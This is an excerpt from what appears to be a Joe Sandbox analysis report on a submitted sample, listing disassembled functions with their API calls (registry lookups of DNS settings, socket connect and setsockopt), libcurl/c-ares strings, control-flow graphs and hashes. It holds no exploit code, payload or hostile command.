                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: recvfrom
                                                              • String ID:
                                                              • API String ID: 846543921-0
                                                              • Opcode ID: b591f24dce9ae6822293c398bb69c874c529a65f1c2c4ab46b57f7b63571135a
                                                              • Instruction ID: b0f71d934690829610bda0cfba07870d7a830710330a4c509e20ec8a99c55c07
                                                              • Opcode Fuzzy Hash: b591f24dce9ae6822293c398bb69c874c529a65f1c2c4ab46b57f7b63571135a
                                                              • Instruction Fuzzy Hash: EDF0F975118348AFD2109B41DC88E6BBBADEBC9754F05496DF998232119371AE109AB2
                                                              Function 0032A440 Relevance: 53.6, APIs: 22, Strings: 8, Instructions: 1066registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0032A499
                                                              • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0032A4FB
                                                              • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0032A531
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0032AA19
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0032AA4C
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0032AA97
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0032AAE9
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0032AB30
                                                              • RegCloseKey.KERNELBASE(?), ref: 0032AB6A
                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0032AB82
                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0032AC46
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0032AD0A
                                                              • RegEnumKeyExA.KERNELBASE ref: 0032AD8D
                                                              • RegCloseKey.KERNELBASE(?), ref: 0032ADD9
                                                              • RegEnumKeyExA.KERNELBASE ref: 0032AE08
                                                              • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0032AE2A
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0032AE54
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0032AF63
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0032AFB2
                                                              • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0032B072
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$Open$AdaptersAddresses$CloseEnum
                                                              • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                              • API String ID: 4281207131-1047472027
                                                              • Opcode ID: 8202deebc68991b6e11ec8adcb17331666569c4cc5fd99f05579c8e282099dd4
                                                              • Instruction ID: 5550f3b621ce80069eb8fdfdb45c1b7b9ae4c5731f05f3782d8392668d0a84f1
                                                              • Opcode Fuzzy Hash: 8202deebc68991b6e11ec8adcb17331666569c4cc5fd99f05579c8e282099dd4
                                                              • Instruction Fuzzy Hash: CD72D0B1608711AFE7219F24DC82F6BBBE8AF85700F154828F985DB291E775E844CB53
                                                              Function 002AA550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 002AA831
                                                              Strings
                                                              • cf-socket.c, xrefs: 002AA5CD, 002AA735
                                                              • Local Interface %s is ip %s using address family %i, xrefs: 002AAE60
                                                              • cf_socket_open() -> %d, fd=%d, xrefs: 002AA796
                                                              • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 002AAD0A
                                                              • @, xrefs: 002AAC42
                                                              • Trying %s:%d..., xrefs: 002AA7C2, 002AA7DE
                                                              • Local port: %hu, xrefs: 002AAF28
                                                              • Trying [%s]:%d..., xrefs: 002AA689
                                                              • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 002AA6CE
                                                              • Couldn't bind to '%s' with errno %d: %s, xrefs: 002AAE1F
                                                              • @, xrefs: 002AA8F4
                                                              • Name '%s' family %i resolved to '%s' family %i, xrefs: 002AADAC
                                                              • Bind to local port %d failed, trying next, xrefs: 002AAFE5
                                                              • Could not set TCP_NODELAY: %s, xrefs: 002AA871
                                                              • bind failed with errno %d: %s, xrefs: 002AB080
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: setsockopt
                                                              • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                              • API String ID: 3981526788-2373386790
                                                              • Opcode ID: e298df314955a51e6f2aa1bcb2cc1901484b6ca322991b3687f6ba6ad0301e1f
                                                              • Instruction ID: da1df0a1e302cb08ec0086ee3219dc035f615768fff7e66823575ee89339fc1b
                                                              • Opcode Fuzzy Hash: e298df314955a51e6f2aa1bcb2cc1901484b6ca322991b3687f6ba6ad0301e1f
                                                              • Instruction Fuzzy Hash: 26620671518342ABE721CF14CC46BABB7E5FF92314F044929F98897292EB71D864CB93
                                                              Function 00339740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 967 339740-33975b 968 339780-339782 967->968 969 33975d-339768 call 3378a0 967->969 971 339914-33994e call 5f8b70 RegOpenKeyExA 968->971 972 339788-3397a0 call 5f8e00 call 3378a0 968->972 978 3399bb-3399c0 969->978 979 33976e-339770 969->979 981 339950-339955 971->981 982 33995a-339992 RegQueryValueExA RegCloseKey call 5f8b98 971->982 972->978 984 3397a6-3397c5 972->984 985 339a0c-339a15 978->985 983 339772-33977e 979->983 979->984 981->985 997 339997-3399b5 call 3378a0 982->997 983->972 990 339827-339833 984->990 991 3397c7-3397e0 984->991 993 339835-33985c call 32e2b0 * 2 990->993 994 33985f-339872 call 335ca0 990->994 995 3397e2-3397f3 call 5f8b50 991->995 996 3397f6-339809 991->996 993->994 1008 3399f0 994->1008 1009 339878-33987d call 3377b0 994->1009 995->996 996->990 1007 33980b-339810 996->1007 997->978 997->984 1007->990 1012 339812-339822 1007->1012 1011 3399f5-3399fb call 335d00 1008->1011 1014 339882-339889 1009->1014 1022 3399fe-339a09 1011->1022 1012->985 1014->1011 1018 33988f-33989b call 324fe0 1014->1018 1018->1008 1025 3398a1-3398c3 call 5f8b50 call 3378a0 1018->1025 1022->985 1031 3399c2-3399ed call 32e2b0 * 2 1025->1031 1032 3398c9-3398db call 32e2d0 1025->1032 1031->1008 1032->1031 1037 3398e1-3398f0 call 32e2d0 1032->1037 1037->1031 1043 3398f6-339905 call 3363f0 1037->1043 1047 339f66-339f7f call 335d00 1043->1047 1048 33990b-33990f 1043->1048 1047->1022 1049 339a3f-339a5a call 336740 call 3363f0 1048->1049 1049->1047 1056 339a60-339a6e call 336d60 1049->1056 1059 339a70-339a94 call 336200 call 3367e0 call 336320 1056->1059 1060 339a1f-339a39 call 336840 call 3363f0 1056->1060 1071 339a16-339a19 1059->1071 1072 339a96-339ac6 call 32d120 1059->1072 1060->1047 1060->1049 1071->1060 1073 339fc1 1071->1073 1078 339ae1-339af7 call 32d190 1072->1078 1079 339ac8-339adb call 32d120 1072->1079 1075 339fc5-339ffd call 335d00 call 32e2b0 * 2 1073->1075 1075->1022 1078->1060 1086 339afd-339b09 call 324fe0 1078->1086 1079->1060 1079->1078 1086->1073 1091 339b0f-339b29 call 32e730 1086->1091 1096 339f84-339f88 1091->1096 1097 339b2f-339b3a call 3378a0 1091->1097 1099 339f95-339f99 1096->1099 1097->1096 1104 339b40-339b54 call 32e760 1097->1104 1101 339fa0-339fb6 call 32ebf0 * 2 1099->1101 1102 339f9b-339f9e 1099->1102 1114 339fb7-339fbe 1101->1114 1102->1073 1102->1101 1110 339f8a-339f92 1104->1110 1111 339b5a-339b6e call 32e730 1104->1111 1110->1099 1117 339b70-33a004 1111->1117 1118 339b8c-339b97 call 3363f0 1111->1118 1114->1073 1123 33a015-33a01d 1117->1123 1126 339c9a-339cab call 32ea00 1118->1126 1127 339b9d-339bbf call 336740 call 3363f0 1118->1127 1124 33a024-33a045 call 32ebf0 * 2 1123->1124 1125 33a01f-33a022 1123->1125 1124->1075 1125->1075 1125->1124 1136 339f31-339f35 1126->1136 1137 339cb1-339ccd call 32ea00 call 32e960 1126->1137 1127->1126 1144 339bc5-339bda call 336d60 1127->1144 1139 339f40-339f61 call 32ebf0 * 2 1136->1139 1140 339f37-339f3a 1136->1140 1153 339ccf 1137->1153 1154 339cfd-339d0e call 32e960 1137->1154 1139->1060 1140->1060 1140->1139 1144->1126 1156 339be0-339bf4 call 336200 call 3367e0 1144->1156 1157 339cd1-339cec call 32e9f0 call 32e4a0 1153->1157 1165 339d53-339d55 1154->1165 1166 339d10 1154->1166 1156->1126 1173 339bfa-339c0b call 336320 1156->1173 1178 339d47-339d51 1157->1178 1179 339cee-339cfb call 32e9d0 1157->1179 1170 339e69-339e8e call 32ea40 call 32e440 1165->1170 1171 339d12-339d2d call 32e9f0 call 32e4a0 1166->1171 1195 339e90-339e92 1170->1195 1196 339e94-339eaa call 32e3c0 1170->1196 1192 339d5a-339d6f call 32e960 1171->1192 1193 339d2f-339d3c call 32e9d0 1171->1193 1187 339c11-339c1c call 337b70 1173->1187 1188 339b75-339b86 call 32ea00 1173->1188 1183 339dca-339ddb call 32e960 1178->1183 1179->1154 1179->1157 1201 339e2e-339e36 1183->1201 1202 339ddd-339ddf 1183->1202 1187->1118 1214 339c22-339c33 call 32e960 1187->1214 1188->1118 1210 339f2d 1188->1210 1224 339dc2 1192->1224 1225 339d71-339d73 1192->1225 1193->1171 1221 339d3e-339d42 1193->1221 1206 339eb3-339ec4 call 32e9c0 1195->1206 1218 339eb0-339eb1 1196->1218 1219 33a04a-33a04c 1196->1219 1207 339e38-339e3b 1201->1207 1208 339e3d-339e5b call 32ebf0 * 2 1201->1208 1211 339e06-339e21 call 32e9f0 call 32e4a0 1202->1211 1206->1060 1227 339eca-339ed0 1206->1227 1207->1208 1216 339e5e-339e67 1207->1216 1208->1216 1210->1136 1250 339e23-339e2c call 32eac0 1211->1250 1251 339de1-339dee call 32ec80 1211->1251 1237 339c66-339c75 call 3378a0 1214->1237 1238 339c35 1214->1238 1216->1170 1216->1206 1218->1206 1230 33a057-33a070 call 32ebf0 * 2 1219->1230 1231 33a04e-33a051 1219->1231 1221->1170 1224->1183 1232 339d9a-339db5 call 32e9f0 call 32e4a0 1225->1232 1235 339ee5-339ef2 call 32e9f0 1227->1235 1230->1114 1231->1073 1231->1230 1265 339db7-339dc0 call 32eac0 1232->1265 1266 339d75-339d82 call 32ec80 1232->1266 1235->1060 1259 339ef8-339f0e call 32e440 1235->1259 1255 33a011 1237->1255 1256 339c7b-339c8f call 32e7c0 1237->1256 1245 339c37-339c51 call 32e9f0 1238->1245 1245->1118 1278 339c57-339c64 call 32e9d0 1245->1278 1269 339df1-339e04 call 32e960 1250->1269 1251->1269 1255->1123 1256->1118 1280 339c95-33a00e 1256->1280 1276 339ed2-339edf call 32e9e0 1259->1276 1277 339f10-339f26 call 32e3c0 1259->1277 1282 339d85-339d98 call 32e960 1265->1282 1266->1282 1269->1201 1269->1211 1276->1060 1276->1235 1277->1276 1293 339f28 1277->1293 1278->1237 1278->1245 1280->1255 1282->1224 1282->1232 1293->1073
                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00339946
                                                              • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00339974
                                                              • RegCloseKey.KERNELBASE(?), ref: 0033998B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                                              • API String ID: 3677997916-4129964100
                                                              • Opcode ID: 764d6d1fa43775f6a34bb5412bf3c783d752c4150a6d1fa810e591efc2fda699
                                                              • Instruction ID: 68ee131c907529ca280a91f901f5d971ba88e4bca70b5b5d75ffa6174e4d5d38
                                                              • Opcode Fuzzy Hash: 764d6d1fa43775f6a34bb5412bf3c783d752c4150a6d1fa810e591efc2fda699
                                                              • Instruction Fuzzy Hash: 5F32A4B5904211ABEB13AB24FC83B1B76E8AF54314F094439F8499A263FB71ED14D793
                                                              Function 002A8B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1388 2a8b50-2a8b69 1389 2a8b6b-2a8b74 1388->1389 1390 2a8be6 1388->1390 1392 2a8beb-2a8bf2 1389->1392 1393 2a8b76-2a8b8d 1389->1393 1391 2a8be9 1390->1391 1391->1392 1394 2a8b8f-2a8ba7 call 286e40 1393->1394 1395 2a8bf3-2a8bfe call 2aa550 1393->1395 1402 2a8cd9-2a8d16 SleepEx 1394->1402 1403 2a8bad-2a8baf 1394->1403 1400 2a8de4-2a8def 1395->1400 1401 2a8c04-2a8c08 1395->1401 1406 2a8e8c-2a8e95 1400->1406 1407 2a8df5-2a8e19 call 2aa150 1400->1407 1404 2a8c0e-2a8c1d 1401->1404 1405 2a8dbd-2a8dc3 1401->1405 1419 2a8d18-2a8d20 1402->1419 1420 2a8d22 1402->1420 1408 2a8ca6-2a8cb0 1403->1408 1409 2a8bb5-2a8bb9 1403->1409 1413 2a8c1f-2a8c30 connect 1404->1413 1414 2a8c35-2a8c48 call 2aa150 1404->1414 1405->1391 1411 2a8f00-2a8f06 1406->1411 1412 2a8e97-2a8e9c 1406->1412 1443 2a8e1b-2a8e26 1407->1443 1444 2a8e88 1407->1444 1408->1402 1415 2a8cb2-2a8cb8 1408->1415 1409->1392 1417 2a8bbb-2a8bc2 1409->1417 1411->1392 1421 2a8e9e-2a8eb6 call 282a00 1412->1421 1422 2a8edf-2a8eef call 2778b0 1412->1422 1413->1414 1442 2a8c4d-2a8c4f 1414->1442 1423 2a8cbe-2a8cd4 call 2ab180 1415->1423 1424 2a8ddc-2a8dde 1415->1424 1417->1392 1418 2a8bc4-2a8bcc 1417->1418 1426 2a8bce-2a8bd2 1418->1426 1427 2a8bd4-2a8bda 1418->1427 1429 2a8d26-2a8d39 1419->1429 1420->1429 1421->1422 1448 2a8eb8-2a8edd call 283410 * 2 1421->1448 1446 2a8ef2-2a8efc 1422->1446 1423->1400 1424->1391 1424->1400 1426->1392 1426->1427 1427->1392 1436 2a8bdc-2a8be1 1427->1436 1439 2a8d3b-2a8d3d 1429->1439 1440 2a8d43-2a8d61 call 28d8c0 call 2aa150 1429->1440 1445 2a8dac-2a8db8 call 2b50a0 1436->1445 1439->1424 1439->1440 1467 2a8d66-2a8d74 1440->1467 1450 2a8c8e-2a8c93 1442->1450 1451 2a8c51-2a8c58 1442->1451 1452 2a8e28-2a8e2c 1443->1452 1453 2a8e2e-2a8e85 call 28d090 call 2b4fd0 1443->1453 1444->1406 1445->1392 1446->1411 1448->1446 1460 2a8dc8-2a8dd9 call 2ab100 1450->1460 1461 2a8c99-2a8c9f 1450->1461 1451->1450 1457 2a8c5a-2a8c62 1451->1457 1452->1444 1452->1453 1453->1444 1463 2a8c6a-2a8c70 1457->1463 1464 2a8c64-2a8c68 1457->1464 1460->1424 1461->1408 1463->1450 1469 2a8c72-2a8c8b call 2b50a0 1463->1469 1464->1450 1464->1463 1467->1392 1472 2a8d7a-2a8d81 1467->1472 1469->1450 1472->1392 1473 2a8d87-2a8d8f 1472->1473 1477 2a8d9b-2a8da1 1473->1477 1478 2a8d91-2a8d95 1473->1478 1477->1392 1481 2a8da7 1477->1481 1478->1392 1478->1477 1481->1445
                                                              APIs
                                                              • connect.WS2_32(?,?,00000001), ref: 002A8C30
                                                              • SleepEx.KERNELBASE(00000000,00000000), ref: 002A8CF3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: Sleepconnect
                                                              • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                              • API String ID: 238548546-879669977
                                                              • Opcode ID: ebf2923de90920214bc38957ea7d00d84d8233509fccc93a332c0c8e515126f2
                                                              • Instruction ID: 021a86b80f84fdd828d18c35403a64da411feec1c80604d2c8af3636188d5aff
                                                              • Opcode Fuzzy Hash: ebf2923de90920214bc38957ea7d00d84d8233509fccc93a332c0c8e515126f2
                                                              • Instruction Fuzzy Hash: 3BB1D570614706EFD714DF24C985BA6BBE1AF46318F048929F8598B2D2EF70EC64CB61
                                                              Function 00272F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1482 272f17-272f8c call 6feb30 call 6fef20 1487 2731c9-2731cd 1482->1487 1488 2731d3-2731d6 1487->1488 1489 272f91-272ff4 call 271619 RegOpenKeyExA 1487->1489 1492 2731c5 1489->1492 1493 272ffa-27300b 1489->1493 1492->1487 1494 27315c-2731ac RegEnumKeyExA 1493->1494 1495 2731b2-2731c2 1494->1495 1496 273010-273083 call 271619 RegOpenKeyExA 1494->1496 1495->1492 1500 27314e-273152 1496->1500 1501 273089-2730d4 RegQueryValueExA 1496->1501 1500->1494 1502 2730d6-273137 call 6fee00 call 6fee90 call 6fef20 call 6fed30 call 6fef20 call 6fd2a0 1501->1502 1503 27313b-27314b RegCloseKey 1501->1503 1502->1503 1503->1500
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpDownload File
